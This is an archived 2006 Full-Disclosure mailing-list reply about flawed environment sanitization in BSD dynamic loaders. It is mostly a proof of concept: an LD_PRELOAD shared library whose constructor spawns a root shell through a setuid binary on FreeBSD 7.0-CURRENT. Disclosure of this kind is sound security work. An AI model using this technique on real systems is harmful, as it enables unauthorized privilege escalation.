| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 22 Nov 2006 22:55:37 +0100
From: "Tyop?" <tyoptyop@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Lack of environment sanitization in the
FreeBSD, OpenBSD, NetBSD dynamic loaders.
On 11/22/06, In Cognito <defend.the.world@...il.com> wrote:
> Impact: Serious. May lead to privilege escalation.
>
> A class of security vulnerabilities has resurfaced in the dynamic loaders
> of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment
> variables for suid and sgid binaries.
>
> Due to either badly implemented sanitization or a lack of it, a setuid
> binary may execute other processes with a tainted environment.
>
> [...]
>
> Have fun! Stay safe!
>
Fun. Not "perfectly" safe.
My experience :
%id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
%cat vuln.c
main()
{
setuid(0);
execl("/usr/bin/id","id",0);
}
%cc vuln.c -o vuln && chmod 4711 ./vuln
%exit
> id
uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
> ls -l vuln
-rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln
> cat tyop.c
__attribute__ ((constructor)) main()
{
printf("[+] Hello from shared library land\n");
execle("/bin/sh","sh",0,0);
}
> cc -shared -o lib.so tyop.c
> setenv LD_PRELOAD "/home/tyop/test/lib.so"
> ./vuln
[+] Hello from shared library land
# id
uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
# echo "It works on `uname -sr`"
It works on FreeBSD 7.0-CURRENT-200609
#
Have a nice day.
--
Tyop?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists